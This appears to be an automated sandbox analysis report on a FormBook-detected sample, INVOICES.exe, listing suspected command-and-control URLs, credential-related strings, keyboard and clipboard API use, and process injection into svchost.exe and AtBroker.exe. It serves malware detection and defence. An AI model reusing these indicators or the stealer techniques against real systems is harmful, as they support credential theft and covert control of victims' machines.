3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: AtBroker.exe, 00000005.00000002.3881258314.00000000058DE000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003C3E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://premium303max.rest/4sq5/?edD=auinYk/N7fzuxFx7OuKPDQsKV8iAhIfXxmAc
                Source: XORjEgwNIUb.exe, 00000006.00000002.3880793532.000000000556E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tangible.online
                Source: XORjEgwNIUb.exe, 00000006.00000002.3880793532.000000000556E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tangible.online/5byq/
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
                Source: AtBroker.exe, 00000005.00000002.3876263575.0000000000754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: AtBroker.exe, 00000005.00000002.3876263575.0000000000754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: AtBroker.exe, 00000005.00000003.1878415609.00000000044E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: AtBroker.exe, 00000005.00000002.3876263575.0000000000754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: AtBroker.exe, 00000005.00000002.3876263575.0000000000754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: AtBroker.exe, 00000005.00000002.3876263575.0000000000754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: AtBroker.exe, 00000005.00000002.3876263575.0000000000754000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.dpo-medicina.online&rand=
                Source: AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: AtBroker.exe, 00000005.00000002.3881258314.0000000005A70000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3883082226.0000000007710000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3881258314.0000000005296000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003DD0000.00000004.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.00000000035F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.dpo-medicina.online&utm_medium=parking&utm_campaign=s_l
                Source: AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.dpo-medicina.online&utm_medium=parking&utm_campaign=s_
                Source: AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.dpo-medicina.online&utm_medium=parking&utm_campaign=s_lan
                Source: AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
                Source: AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.dpo-medicina.online&amp;reg_source=parking_auto
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007A407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007A407C
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007A427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_007A427A
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007A407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007A407C
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0079003A
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BCB26 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_007BCB26

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3877127380.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3875893273.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3877005602.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1651329833.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1654342305.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3877109191.00000000027F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1651003689.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: This is a third-party compiled AutoIt script.0_2_00733B4C
                Source: INVOICES.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: INVOICES.exe, 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_70183a69-4
                Source: INVOICES.exe, 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_ea7d5ff5-4
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: INVOICES.exe
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00733633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00733633
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BC216 PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_007BC216
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BC502 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_007BC502
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BC5E7 SendMessageW,NtdllDialogWndProc_W,0_2_007BC5E7
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BC668 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_007BC668
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BC8F9 NtdllDialogWndProc_W,0_2_007BC8F9
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BC8CA NtdllDialogWndProc_W,0_2_007BC8CA
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BC973 NtdllDialogWndProc_W,0_2_007BC973
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BC928 NtdllDialogWndProc_W,0_2_007BC928
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BC9A8 ClientToScreen,NtdllDialogWndProc_W,0_2_007BC9A8
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BCAE6 GetWindowLongW,NtdllDialogWndProc_W,0_2_007BCAE6
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BCB26 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_007BCB26
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00731290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00731290
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00731287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,74B1C8D0,NtdllDialogWndProc_W,0_2_00731287
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BD422 NtdllDialogWndProc_W,0_2_007BD422
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BD4A8 GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_007BD4A8
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0073167D NtdllDialogWndProc_W,0_2_0073167D
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007316DE GetParent,NtdllDialogWndProc_W,0_2_007316DE
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007316B5 NtdllDialogWndProc_W,0_2_007316B5
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BD7F6 NtdllDialogWndProc_W,0_2_007BD7F6
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0073189B NtdllDialogWndProc_W,0_2_0073189B
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BBCC7 NtdllDialogWndProc_W,CallWindowProcW,0_2_007BBCC7
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BBFF6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_007BBFF6
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BBF9A NtdllDialogWndProc_W,0_2_007BBF9A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C5C3 NtClose,2_2_0042C5C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B60 NtClose,LdrInitializeThunk,2_2_03672B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03672DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk,2_2_036735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674340 NtSetContextThread,2_2_03674340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674650 NtSuspendThread,2_2_03674650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BE0 NtQueryValueKey,2_2_03672BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BF0 NtAllocateVirtualMemory,2_2_03672BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BA0 NtEnumerateValueKey,2_2_03672BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B80 NtQueryInformationFile,2_2_03672B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AF0 NtWriteFile,2_2_03672AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AD0 NtReadFile,2_2_03672AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AB0 NtWaitForSingleObject,2_2_03672AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F60 NtCreateProcessEx,2_2_03672F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F30 NtCreateSection,2_2_03672F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FE0 NtCreateFile,2_2_03672FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FA0 NtQuerySection,2_2_03672FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FB0 NtResumeThread,2_2_03672FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F90 NtProtectVirtualMemory,2_2_03672F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E30 NtWriteVirtualMemory,2_2_03672E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EE0 NtQueueApcThread,2_2_03672EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EA0 NtAdjustPrivilegesToken,2_2_03672EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E80 NtReadVirtualMemory,2_2_03672E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D30 NtUnmapViewOfSection,2_2_03672D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D00 NtSetInformationFile,2_2_03672D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D10 NtMapViewOfSection,2_2_03672D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DD0 NtDelayExecution,2_2_03672DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DB0 NtEnumerateKey,2_2_03672DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C60 NtCreateKey,2_2_03672C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C70 NtFreeVirtualMemory,2_2_03672C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C00 NtQueryInformationProcess,2_2_03672C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CF0 NtOpenProcess,2_2_03672CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CC0 NtQueryVirtualMemory,2_2_03672CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CA0 NtQueryInformationToken,2_2_03672CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673010 NtOpenDirectoryObject,2_2_03673010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673090 NtSetValueKey,2_2_03673090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036739B0 NtGetContextThread,2_2_036739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D70 NtOpenThread,2_2_03673D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D10 NtOpenProcessToken,2_2_03673D10
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04764650 NtSuspendThread,LdrInitializeThunk,5_2_04764650
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04764340 NtSetContextThread,LdrInitializeThunk,5_2_04764340
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04762C70
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762C60 NtCreateKey,LdrInitializeThunk,5_2_04762C60
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_04762CA0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_04762D30
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762D10 NtMapViewOfSection,LdrInitializeThunk,5_2_04762D10
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_04762DF0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762DD0 NtDelayExecution,LdrInitializeThunk,5_2_04762DD0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762EE0 NtQueueApcThread,LdrInitializeThunk,5_2_04762EE0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_04762E80
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762F30 NtCreateSection,LdrInitializeThunk,5_2_04762F30
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762FE0 NtCreateFile,LdrInitializeThunk,5_2_04762FE0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762FB0 NtResumeThread,LdrInitializeThunk,5_2_04762FB0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762AF0 NtWriteFile,LdrInitializeThunk,5_2_04762AF0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762AD0 NtReadFile,LdrInitializeThunk,5_2_04762AD0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762B60 NtClose,LdrInitializeThunk,5_2_04762B60
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04762BF0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762BE0 NtQueryValueKey,LdrInitializeThunk,5_2_04762BE0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_04762BA0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047635C0 NtCreateMutant,LdrInitializeThunk,5_2_047635C0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_047639B0 NtGetContextThread,LdrInitializeThunk,5_2_047639B0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762C00 NtQueryInformationProcess,5_2_04762C00
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762CF0 NtOpenProcess,5_2_04762CF0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762CC0 NtQueryVirtualMemory,5_2_04762CC0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762D00 NtSetInformationFile,5_2_04762D00
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762DB0 NtEnumerateKey,5_2_04762DB0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762E30 NtWriteVirtualMemory,5_2_04762E30
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762EA0 NtAdjustPrivilegesToken,5_2_04762EA0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762F60 NtCreateProcessEx,5_2_04762F60
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762FA0 NtQuerySection,5_2_04762FA0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762F90 NtProtectVirtualMemory,5_2_04762F90
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762AB0 NtWaitForSingleObject,5_2_04762AB0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04762B80 NtQueryInformationFile,5_2_04762B80
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04763010 NtOpenDirectoryObject,5_2_04763010
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04763090 NtSetValueKey,5_2_04763090
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04763D70 NtOpenThread,5_2_04763D70
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_04763D10 NtOpenProcessToken,5_2_04763D10
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_003691C0 NtCreateFile,5_2_003691C0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_00369330 NtReadFile,5_2_00369330
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_00369420 NtDeleteFile,5_2_00369420
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_003694C0 NtClose,5_2_003694C0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_00369620 NtAllocateVirtualMemory,5_2_00369620
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079A279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0079A279
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00788638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74CA5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_00788638
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00795264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00795264
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0073E8000_2_0073E800
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0075DAF50_2_0075DAF5
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0073E0600_2_0073E060
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007441400_2_00744140
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007523450_2_00752345
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007B04650_2_007B0465
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007664520_2_00766452
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007625AE0_2_007625AE
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0075277A0_2_0075277A
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007468410_2_00746841
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007B08E20_2_007B08E2
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007489680_2_00748968
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007989320_2_00798932
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0078E9280_2_0078E928
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0076890F0_2_0076890F
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007669C40_2_007669C4
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0075CCA10_2_0075CCA1
